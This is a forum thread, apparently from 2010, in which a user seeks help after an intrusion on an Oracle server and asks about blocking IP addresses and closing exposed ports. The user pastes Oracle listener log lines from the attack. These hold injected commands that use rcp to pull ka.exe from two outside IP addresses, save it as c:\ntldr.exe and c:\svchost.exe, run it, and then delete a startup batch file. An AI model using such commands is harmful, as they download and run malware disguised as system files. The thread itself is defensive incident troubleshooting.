Hi. Can somebody tell me if its possible to block certain IP address's from accessing our network from the web.

It would appear we had a hack last night, didn't do too much damage as far as we are aware, but they tried copying files from a server to ours.

I'm sure they'll be back to finish the job, so want to stop these ip address's using the firewall in the router.

Trouble is, is this router too old for things like this?

These attacks on port 80? Or do you have some other means of entry?

Hi Lozstlouis,

How can I tell how they gained entry? It would appear they tried to copy a file over to an Oracle server by pretending to be a user. They managed to copy a ora.bat file into the start up folder, then disabled the oracle listener. Of course I restarted the server and the bat file was activated.

It would however appear that this bat file had failed to do its job, as the last command in the file was to delete the bat file, but it was still there after the reboot.

Contents of the file:

02-NOV-2010 22:13:11 * log_file * 0
02-NOV-2010 22:13:11 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || rcp -b 89.249.22.15.adm:/var/adm/.x/ka.exe c:\ntldr.exe || error

NL-00303: syntax error in NV string
02-NOV-2010 22:13:12 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || c:\ntldr.exe || error

NL-00303: syntax error in NV string
02-NOV-2010 22:13:12 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || rcp -b 140.117.31.8.adm:/var/adm/.x/ka.exe c:\svchost.exe || error

NL-00303: syntax error in NV string
02-NOV-2010 22:13:12 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || c:\svchost.exe || error

NL-00303: syntax error in NV string
02-NOV-2010 22:13:13 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || del c:\Documents and Settings\All Users\Start Menu\Programs\Startup\ora.bat || error

NL-00303: syntax error in NV string

Im confused as to why port 80 is visible on the web, as nothing is being redirected and the management from the internet is turned off? But according to Shields Up, it can see port 80 is open, along with ports 23,25 and 143.

Now we do have a mail server running, so this could have something to do with the above, but i don't really know

Port scanner detected 80 (sure remote management is off?) Port 23 (telnet) 25 (SMTP) & 143 (IMAP). So ports 25 & 143 will be your mail server. What is Oracle doing outward facing? Remote users? What port?

Yes, remote management is off, tried a port scan again late last night and the only ports it found open this time were 23, 25 & 143.

I don't know why Oracle was Outward facing, but it was on port 1521 which has now been removed, which i'm now suspecting they used to connect to us.

There used to be remote users at one time......

Then that will problem slam the door shut on any foul play. What the telnet port open for?